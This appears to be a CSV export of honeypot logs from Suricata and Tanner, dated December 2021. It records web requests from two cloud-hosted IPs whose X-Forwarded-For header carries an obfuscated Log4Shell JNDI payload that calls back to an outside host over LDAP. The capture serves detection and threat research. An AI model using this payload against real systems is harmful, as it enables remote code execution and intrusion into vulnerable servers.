""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=91c333a6-1f03-4909-a6d0-c0546fee1053""}, ""uuid"": ""e0c7db10-9902-420a-b2f0-cef9df043cf3"", ""peer"": {""ip"": ""143.198.163.225"", ""port"": 54014}, ""status"": 200, ""cookies"": {""sess_uuid"": ""91c333a6-1f03-4909-a6d0-c0546fee1053""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""812fb158-2314-46e9-9419-e410af63f39c""}}}, ""timestamp"": ""2021-12-15T08:56:52.504095""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","812fb158-2314-46e9-9419-e410af63f39c","0.6.0",,,,,,,,,,,,,,,,,,"143.198.163.225",54014,,,,,,,,,200,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:56:52.504095",,,,,,,,,Tanner,,,"e0c7db10-9902-420a-b2f0-cef9df043cf3",
"2021-12-15T08:56:51.087Z",1,"ZiBPvX0B5e7x5EYnBj-p","logstash-suricata-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,239833890074467,"XO Communications",2828,,NA,US,US,"United States",,"143.198.163.225","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,30ccdadf8271,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",7871085,,"{""timestamp"":""2021-12-15T08:56:51.087891+0000"",""flow_id"":239833890074467,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""143.198.163.225"",""src_port"":54014,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"143.198.163.225",54014,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:56:51.087891+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T08:56:51.087Z",1,"ZyBPvX0B5e7x5EYnBj-p","logstash-suricata-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"143.198.163.225",54014,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text",a11b96dc89694dc220111a6d8a9ab389,"[]",4019,CLOSED,false,0,,,,,,,239833890074467,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,30ccdadf8271,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",7871722,,"{""timestamp"":""2021-12-15T08:56:51.087891+0000"",""flow_id"":239833890074467,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""143.198.163.225"",""dest_port"":54014,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text"",""gaps"":false,""state"":""CLOSED"",""md5"":""a11b96dc89694dc220111a6d8a9ab389"",""stored"":false,""size"":4019,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T08:56:51.087891+0000",,,,,,,,,Suricata,,,,
"2021-12-15T08:56:50.952Z",1,LbRPvX0BCXMCNTQLIJZT,"logstash-tanner-2021.12.15",,"_doc","13aa9408-322c-43ae-a814-ed98938bd3a7",30ccdadf8271,"50457cf1-59c1-4d07-9e33-609c2c14ae5f",30ccdadf8271,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"XO Communications",2828,,NA,US,US,"United States",,"143.198.163.225","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",30ccdadf8271,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",61360,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""e0c7db10-9902-420a-b2f0-cef9df043cf3"", ""peer"": {""ip"": ""143.198.163.225"", ""port"": 54014}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""91c333a6-1f03-4909-a6d0-c0546fee1053""}}}, ""timestamp"": ""2021-12-15T08:56:50.952553""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","91c333a6-1f03-4909-a6d0-c0546fee1053","0.6.0",,,,,,,,,,,,,,,,,,"143.198.163.225",54014,,,,,,,,,200,,,satisfiedweakness,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:56:50.952553",,,,,,,,,Tanner,,,"e0c7db10-9902-420a-b2f0-cef9df043cf3",
"2021-12-15T08:33:17.575Z",1,KII5vX0B6VkG8jKzdUQ3,"logstash-suricata-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,925224678568644,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,7ae4d5d6f86f,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4866609,,"{""timestamp"":""2021-12-15T08:33:17.575412+0000"",""flow_id"":925224678568644,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.167.229"",""src_port"":50702,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.167.229",50702,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:33:17.575412+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T08:33:17.575Z",1,mbM5vX0BCXMCNTQLddg4,"logstash-suricata-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.167.229",50702,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel",d316e1622c58825727e7e4e6c954d289,"[]",7886,CLOSED,false,2,,,,,,,925224678568644,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,7ae4d5d6f86f,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4867273,,"{""timestamp"":""2021-12-15T08:33:17.575412+0000"",""flow_id"":925224678568644,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.167.229"",""dest_port"":50702,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""d316e1622c58825727e7e4e6c954d289"",""stored"":false,""size"":7886,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T08:33:17.575412+0000",,,,,,,,,Suricata,,,,
"2021-12-15T08:33:17.488Z",1,KbM5vX0BCXMCNTQLidmk,"logstash-tanner-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",7ae4d5d6f86f,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",35654,,"{""method"": ""GET"", ""path"": ""/favicon.ico?1528612569"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d""}, ""uuid"": ""55f13f21-392e-4a47-b189-33643d9a922e"", ""peer"": {""ip"": ""138.197.167.229"", ""port"": 50702}, ""status"": 200, ""cookies"": {""sess_uuid"": ""1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1918db7b-bb61-4089-9262-98f2d69b3f9f""}}}, ""timestamp"": ""2021-12-15T08:33:17.488948""}",,,,,,GET,,,,,,"/favicon.ico?1528612569",,,,,,,,,,,index,1,1,"0.6.0","1918db7b-bb61-4089-9262-98f2d69b3f9f","0.6.0",,,,,,,,,,,,,,,,,,"138.197.167.229",50702,,,,,,,,,200,,,loudwheel,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:33:17.488948",,,,,,,,,Tanner,,,"55f13f21-392e-4a47-b189-33643d9a922e",
"2021-12-15T08:33:17.477Z",1,Sx85vX0B5e7x5EYndYE4,"logstash-suricata-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,925224678568644,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,7ae4d5d6f86f,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4865141,,"{""timestamp"":""2021-12-15T08:33:17.477781+0000"",""flow_id"":925224678568644,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.167.229"",""src_port"":50702,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.167.229",50702,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:33:17.477781+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T08:33:17.477Z",1,KoI5vX0B6VkG8jKzdUQ4,"logstash-suricata-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.167.229",50702,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",27a505e858e000b7a478dfde26bf8378,"[]",446,CLOSED,false,1,,,,,,,925224678568644,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,7ae4d5d6f86f,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4865790,,"{""timestamp"":""2021-12-15T08:33:17.477781+0000"",""flow_id"":925224678568644,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.167.229"",""dest_port"":50702,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""27a505e858e000b7a478dfde26bf8378"",""stored"":false,""size"":446,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T08:33:17.477781+0000",,,,,,,,,Suricata,,,,
"2021-12-15T08:33:17.318Z",1,ZR85vX0B5e7x5EYniYKd,"logstash-tanner-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",7ae4d5d6f86f,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",34770,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d""}, ""uuid"": ""55f13f21-392e-4a47-b189-33643d9a922e"", ""peer"": {""ip"": ""138.197.167.229"", ""port"": 50702}, ""status"": 200, ""cookies"": {""sess_uuid"": ""1d4c0c19-d9a4-41fc-9fe1-58104a59fd3d""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1918db7b-bb61-4089-9262-98f2d69b3f9f""}}}, ""timestamp"": ""2021-12-15T08:33:17.318429""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","1918db7b-bb61-4089-9262-98f2d69b3f9f","0.6.0",,,,,,,,,,,,,,,,,,"138.197.167.229",50702,,,,,,,,,200,,,loudwheel,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:33:17.318429",,,,,,,,,Tanner,,,"55f13f21-392e-4a47-b189-33643d9a922e",
"2021-12-15T08:33:17.301Z",1,mLM5vX0BCXMCNTQLddg4,"logstash-suricata-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.167.229",50702,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",a11b96dc89694dc220111a6d8a9ab389,"[]",4019,CLOSED,false,0,,,,,,,925224678568644,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,7ae4d5d6f86f,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4864342,,"{""timestamp"":""2021-12-15T08:33:17.301346+0000"",""flow_id"":925224678568644,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.167.229"",""dest_port"":50702,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""a11b96dc89694dc220111a6d8a9ab389"",""stored"":false,""size"":4019,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T08:33:17.301346+0000",,,,,,,,,Suricata,,,,
"2021-12-15T08:33:17.301Z",1,J4I5vX0B6VkG8jKzdUQ3,"logstash-suricata-2021.12.15",,"_doc","73efae14-eb5a-4366-9388-aec82a6a21bd",7ae4d5d6f86f,"360f177b-f91b-457e-a910-f20d2dd1d5aa",7ae4d5d6f86f,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,925224678568644,"Digital Ocean, Inc.",14061,Toronto,NA,CA,CA,Canada,,"138.197.167.229","43.6547","{""lon"":-79.3623,""lat"":43.6547}","-79.3623",M5A,ON,Ontario,"America/Toronto",,,,,,,,,,,,,,,7ae4d5d6f86f,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",4863703,,"{""timestamp"":""2021-12-15T08:33:17.301346+0000"",""flow_id"":925224678568644,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.167.229"",""src_port"":50702,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.167.229",50702,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T08:33:17.301346+0000",,,,,,,,0,Suricata,,,,
